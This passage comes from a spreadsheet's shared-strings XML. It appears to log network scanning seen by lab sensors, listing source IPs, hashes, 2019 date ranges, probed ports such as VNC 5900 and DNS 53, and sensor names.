>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;59566&amp;&amp;53&amp;&amp;4376&amp;&amp;59459&amp;&amp;58403&amp;&amp;63337&amp;&amp;54287&amp;&amp;55581&amp;&amp;50166</t>
  </si>
  <si>
    <t>2019-01-11</t>
  </si>
  <si>
    <t>2019-10-26</t>
  </si>
  <si>
    <t>::ffff:a2d8:f3ef</t>
  </si>
  <si>
    <t>be6a6e2f341d2a61d1455981fe64389f</t>
  </si>
  <si>
    <t>172.81.62.215</t>
  </si>
  <si>
    <t>unassigned.172-81-62-215.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_DNS_H40&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H31&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H5</t>
  </si>
  <si>
    <t>5900&amp;&amp;53&amp;&amp;12708&amp;&amp;54234&amp;&amp;61227&amp;&amp;64052&amp;&amp;63655</t>
  </si>
  <si>
    <t>::ffff:ac51:3ed7</t>
  </si>
  <si>
    <t>4148baf2ea35001a95a77e6ca17a481a</t>
  </si>
  <si>
    <t>172.81.62.220</t>
  </si>
  <si>
    <t>NA&amp;&amp;unassigned.172-81-62-220.spryt.net</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H46</t>
  </si>
  <si>
    <t>5900&amp;&amp;52824&amp;&amp;60370&amp;&amp;63616&amp;&amp;58104&amp;&amp;64421</t>
  </si>
  <si>
    <t>::ffff:ac51:3edc</t>
  </si>
  <si>
    <t>109721937a9d03f2326c6d4682e12cbf</t>
  </si>
  <si>
    <t>172.81.60.75</t>
  </si>
  <si>
    <t>NA&amp;&amp;unassigned.172-81-60-75.spryt.net</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H5</t>
  </si>
  <si>
    <t>5900&amp;&amp;60898&amp;&amp;65119&amp;&amp;52896&amp;&amp;56787&amp;&amp;63169&amp;&amp;53850&amp;&amp;61840&amp;&amp;56365&amp;&amp;56820&amp;&amp;60762&amp;&amp;52401</t>
  </si>
  <si>
    <t>::ffff:ac51:3c4b</t>
  </si>
  <si>
    <t>6f37994ed880f42b65b395211783c5d8</t>
  </si>
  <si>
    <t>172.81.62.183</t>
  </si>
  <si>
    <t>unassigned.172-81-62-183.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_DHCP_H3&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_DNS_H27&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_DNS_H21&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;67&amp;&amp;25313&amp;&amp;53&amp;&amp;11237&amp;&amp;60616&amp;&amp;53&amp;&amp;11436&amp;&amp;58449&amp;&amp;57606&amp;&amp;54846&amp;&amp;53010&amp;&amp;54065&amp;&amp;57580&amp;&amp;60604&amp;&amp;52128&amp;&amp;62891&amp;&amp;56202&amp;&amp;55578</t>
  </si>
  <si>
    <t>::ffff:ac51:3eb7</t>
  </si>
  <si>
    <t>200edc11fda7647c70319542db58c2d9</t>
  </si>
  <si>
    <t>172.81.62.218</t>
  </si>
  <si>
    <t>NA&amp;&amp;unassigned.172-81-62-218.spryt.net</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_VNC_H44</t>
  </si>
  <si>
    <t>5900&amp;&amp;58307&amp;&amp;64027&amp;&amp;55284&amp;&amp;50753&amp;&amp;50451&amp;&amp;51262&amp;&amp;50386&amp;&amp;57160&amp;&amp;61466&amp;&amp;49974&amp;&amp;51843&amp;&amp;55607</t>
  </si>
  <si>
    <t>::ffff:ac51:3eda</t>
  </si>
  <si>
    <t>bf32a8c5c049167ee5f11658cdc4414e</t>
  </si>
  <si>
    <t>172.81.60.81</t>
  </si>
  <si>
    <t>NA&amp;&amp;unassigned.172-81-60-81.spryt.net</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_VNC_H14</t>
  </si>
  <si>
    <t>61330&amp;&amp;5900&amp;&amp;59888&amp;&amp;62111&amp;&amp;52068&amp;&amp;50188&amp;&amp;51637&amp;&amp;61984&amp;&amp;65030&amp;&amp;62237&amp;&amp;50442&amp;&amp;65041</t>
  </si>
  <si>
    <t>::ffff:ac51:3c51</t>
  </si>
  <si>
    <t>ccfe8912549abd4d357fcfa82545917b</t>
  </si>
  <si>
    <t>142.202.189.47</t>
  </si>
  <si>
    <t>unassigned.142-202-189-47.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_DNS_H13&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_VNC_H47</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53&amp;&amp;25369&amp;&amp;52722&amp;&amp;50120&amp;&amp;59521&amp;&amp;49657&amp;&amp;60266&amp;&amp;64841&amp;&amp;55791&amp;&amp;49371&amp;&amp;60634&amp;&amp;51247&amp;&amp;59816</t>
  </si>
  <si>
    <t>::ffff:8eca:bd2f</t>
  </si>
  <si>
    <t>478e76c7f1f51118d9e69b31e6006962</t>
  </si>
  <si>
    <t>142.202.189.46</t>
  </si>
  <si>
    <t>unassigned.142-202-189-46.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_DNS_H39&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53&amp;&amp;24235&amp;&amp;63908&amp;&amp;64383&amp;&amp;53523&amp;&amp;49595&amp;&amp;51911&amp;&amp;59456&amp;&amp;62402</t>
  </si>
  <si>
    <t>::ffff:8eca:bd2e</t>
  </si>
  <si>
    <t>902928e3b30b75692ef2555f21bd49a7</t>
  </si>
  <si>
    <t>172.81.62.236</t>
  </si>
  <si>
    <t>NA&amp;&amp;unassigned.172-81-62-236.spryt.net</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H41</t>
  </si>
  <si>
    <t>5900&amp;&amp;55708&amp;&amp;53189&amp;&amp;60001&amp;&amp;53083&amp;&amp;59336&amp;&amp;54397&amp;&amp;54990&amp;&amp;65154&amp;&amp;58825&amp;&amp;52976&amp;&amp;50356&amp;&amp;53722&amp;&amp;60251&amp;&amp;57617</t>
  </si>
  <si>
    <t>::ffff:ac51:3eec</t>
  </si>
  <si>
    <t>231c06cf71129f97a4e04de9bca5807b</t>
  </si>
  <si>
    <t>172.81.62.78</t>
  </si>
  <si>
    <t>NA&amp;&amp;unassigned.172-81-62-78.spryt.net</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H10</t>
  </si>
  <si>
    <t>5900&amp;&amp;64575&amp;&amp;51217&amp;&amp;62762&amp;&amp;65206&amp;&amp;61729&amp;&amp;54986&amp;&amp;54706&amp;&amp;60644&amp;&amp;54181&amp;&amp;52035</t>
  </si>
  <si>
    <t>::ffff:ac51:3e4e</t>
  </si>
  <si>
    <t>bef9f6c31e36047c5e66fed0a5cbd3b8</t>
  </si>
  <si>
    <t>172.81.62.198</t>
  </si>
  <si>
    <t>unassigned.172-81-62-198.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_DNS_H35&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_VNC_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53&amp;&amp;8342&amp;&amp;53428&amp;&amp;61413&amp;&amp;60028&amp;&amp;50038&amp;&amp;58816&amp;&amp;52014&amp;&amp;51300&amp;&amp;53877&amp;&amp;59417&amp;&amp;65153&amp;&amp;64347</t>
  </si>
  <si>
    <t>::ffff:ac51:3ec6</t>
  </si>
  <si>
    <t>8d21db1da04fc0ae95e408380cab97f2</t>
  </si>
  <si>
    <t>172.81.62.216</t>
  </si>
  <si>
    <t>unassigned.172-81-62-216.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H39&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;30202&amp;&amp;5900&amp;&amp;59304&amp;&amp;49415&amp;&amp;56897&amp;&amp;62125&amp;&amp;58124&amp;&amp;60577&amp;&amp;50981&amp;&amp;65438&amp;&amp;59219</t>
  </si>
  <si>
    <t>::ffff:ac51:3ed8</t>
  </si>
  <si>
    <t>fee7726aef2b339da7f9a2a9d81d9247</t>
  </si>
  <si>
    <t>172.81.62.119</t>
  </si>
  <si>
    <t>NA&amp;&amp;unassigned.172-81-62-119.spryt.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_DNS_H13&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_DHCP_H17&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H31&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H10</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53&amp;&amp;25968&amp;&amp;61524&amp;&amp;67&amp;&amp;15872&amp;&amp;59021&amp;&amp;50913&amp;&amp;59754&amp;&amp;64296&amp;&amp;52451&amp;&amp;57223&amp;&amp;60670&amp;&amp;63915&amp;&amp;56988</t>
  </si>
  <si>
    <t>::ffff:ac51:3e77</t>
  </si>
  <si>
    <t>c6cde11810265710c7e4c6ea4e9d6940</t>
  </si>
  <si>
    <t>172.81.62.230</t>
  </si>
  <si>
    <t>NA&amp;&amp;unassigned.172-81-62-230.spryt.net</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB